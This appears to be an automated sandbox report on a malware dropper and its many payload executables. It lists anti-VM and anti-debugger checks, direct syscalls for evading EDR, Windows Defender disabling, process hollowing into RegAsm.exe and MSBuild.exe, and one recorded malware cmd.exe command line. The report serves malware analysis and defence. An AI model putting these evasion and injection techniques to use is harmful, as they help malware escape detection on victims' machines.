Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (core)
Source: RegAsm.exe, 00000017.00000002.3132250995.0000000000DB5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 11 Server Enterprise without Hyper-V (core)
Source: svchost.exe, 00000003.00000002.2891186635.000001AC23640000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 11 Server Datacenter without Hyper-V (core)
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2413089730.0000000005FDD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}R
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (core)
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2549795931.000000000124B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}K
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 10 Server Enterprise without Hyper-V (core)
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2413089730.0000000005FF5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_B23F6320
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 10 Server Datacenter without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: :Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2540342471.0000000001480000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 5Windows 11 Essential Server Solutions without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 2016 Server Standard without Hyper-V (core)
Source: svchost.exe, 00000003.00000002.2882896002.000001AC23633000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000&00000
Source: svchost.exe, 00000003.00000003.1624757675.000001AC23644000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 8 Server Standard without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 5Windows 10 Essential Server Solutions without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: xVBoxService.exe
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (full)
Source: H14SDf_AWcPvvQK5Xx97sISX.exe, 00000010.00000002.3137071577.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2193008587.0000000002F20000.00000004.00001000.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2195905601.0000000002F20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: \SystemRoot\system32\ntkrnlmp.exeSDT\VBOX__
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 8 Server Enterprise without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: *Windows 11 Server Standard without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: ,Windows 2016 Server Standard without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 2012 Server Standard without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 8 Server Datacenter without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (full)
Source: ifM1E2HUtOYe96efnF4a_sDH.exe, 00000011.00000002.3136449020.0000000001A6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: VBoxService.exe
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2184193605.0000000002F20000.00000004.00001000.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2185298361.0000000002F20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: \SystemRoot\system32\ntkrnlp.exeSDT\VBOX__
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 8.1 Server Standard without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: *Windows 10 Server Standard without Hyper-V
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 1Windows 11 Server Standard without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 1Windows 10 Server Standard without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (full)
Source: svchost.exe, 00000003.00000002.2868341771.000001AC23602000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: VMWare
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 2Windows 8.1 Server Standard without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Windows 10 Server Enterprise without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (core)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3136763184.000000000184E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (full)
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3127250876.0000000000AA7000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: #Windows 11 Microsoft Hyper-V Server

Source: C:\Users\user\Desktop\WlCIinu0yp.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\H14SDf_AWcPvvQK5Xx97sISX.exe	Process queried: DebugPort
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Process queried: DebugPort
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Process queried: DebugPort
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Process queried: DebugObjectHandle

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe

Code function: 7_2_00418BB0 LoadLibraryA,GetProcAddress,

7_2_00418BB0

Contains functionality to read the PEB

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_004160B0 mov ecx, dword ptr fs:[00000030h]	7_2_004160B0
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_0045D9F0 mov eax, dword ptr fs:[00000030h]	7_2_0045D9F0
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_0045D9F0 mov eax, dword ptr fs:[00000030h]	7_2_0045D9F0
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_0041AB90 mov eax, dword ptr fs:[00000030h]	7_2_0041AB90
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Code function: 7_2_004146B0 mov eax, dword ptr fs:[00000030h]	7_2_004146B0

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe

Code function: 7_2_004094C0 OutputDebugStringA,GetModuleHandleA,GetProcAddress,GetProcessHeap,RtlAllocateHeap,HeapFree,RtlAllocateHeap,HeapFree,

7_2_004094C0

Enables debug privileges

Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process token adjusted: Debug

Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\wDFs1SzoVQiT2__nQmbIm6Rg.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Disables Windows Defender (deletes autostart)

Source: C:\Users\user\Desktop\WlCIinu0yp.exe

Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	NtProtectVirtualMemory: Direct from: 0x140FC862F
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	NtProtectVirtualMemory: Direct from: 0x14101446D
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	NtOpenFile: Direct from: 0x140FBB569
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	NtSetInformationThread: Indirect: 0x1406B2FDA	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	NtProtectVirtualMemory: Direct from: 0x141036FB5
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	NtProtectVirtualMemory: Direct from: 0x140FE889D
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	NtQueryInformationProcess: Indirect: 0x1406A0768	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	NtProtectVirtualMemory: Direct from: 0x14102BFF1
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	NtProtectVirtualMemory: Indirect: 0x140F595B5
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	NtQueryInformationProcess: Indirect: 0x1406A0615	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	NtUnmapViewOfSection: Direct from: 0x141037F5D
Source: C:\Users\user\Desktop\WlCIinu0yp.exe	NtQuerySystemInformation: Indirect: 0x140648961	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	NtProtectVirtualMemory: Direct from: 0x14100CB88
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	NtClose: Direct from: 0x141019C6D
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	NtProtectVirtualMemory: Direct from: 0x140F63C2D
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	NtProtectVirtualMemory: Direct from: 0x1416AD85D

Injects a PE file into a foreign processes

Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\wDFs1SzoVQiT2__nQmbIm6Rg.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Sample uses process hollowing technique

Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe

Section unmapped: unknown base address: 400000

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 456000	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 48E000	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: E07008	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\wDFs1SzoVQiT2__nQmbIm6Rg.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\Documents\SimpleAdobe\wDFs1SzoVQiT2__nQmbIm6Rg.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Users\user\Documents\SimpleAdobe\wDFs1SzoVQiT2__nQmbIm6Rg.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 432000
Source: C:\Users\user\Documents\SimpleAdobe\wDFs1SzoVQiT2__nQmbIm6Rg.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000
Source: C:\Users\user\Documents\SimpleAdobe\wDFs1SzoVQiT2__nQmbIm6Rg.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: AD7008
Source: C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 420000
Source: C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42B000
Source: C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 63E000
Source: C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 8E7008

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\lmmycYk2THJ6kqlicmdyWtVT.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Guests Guests.cmd & Guests.cmd & exit
Source: C:\Users\user\Documents\SimpleAdobe\wDFs1SzoVQiT2__nQmbIm6Rg.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\SimpleAdobe\9RJ0JeM9uj2rfsuq_woBmmIY.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zS6DDC.tmp\Install.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zS6DDC.tmp\Install.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zS6DDC.tmp\Install.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zS6DDC.tmp\Install.exe	Process created: unknown unknown

Source: lmmycYk2THJ6kqlicmdyWtVT.exe, 0000000D.00000003.1990019840.000000000271C000.00000004.00000020.00020000.00000000.sdmp, Biographies.13.dr

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
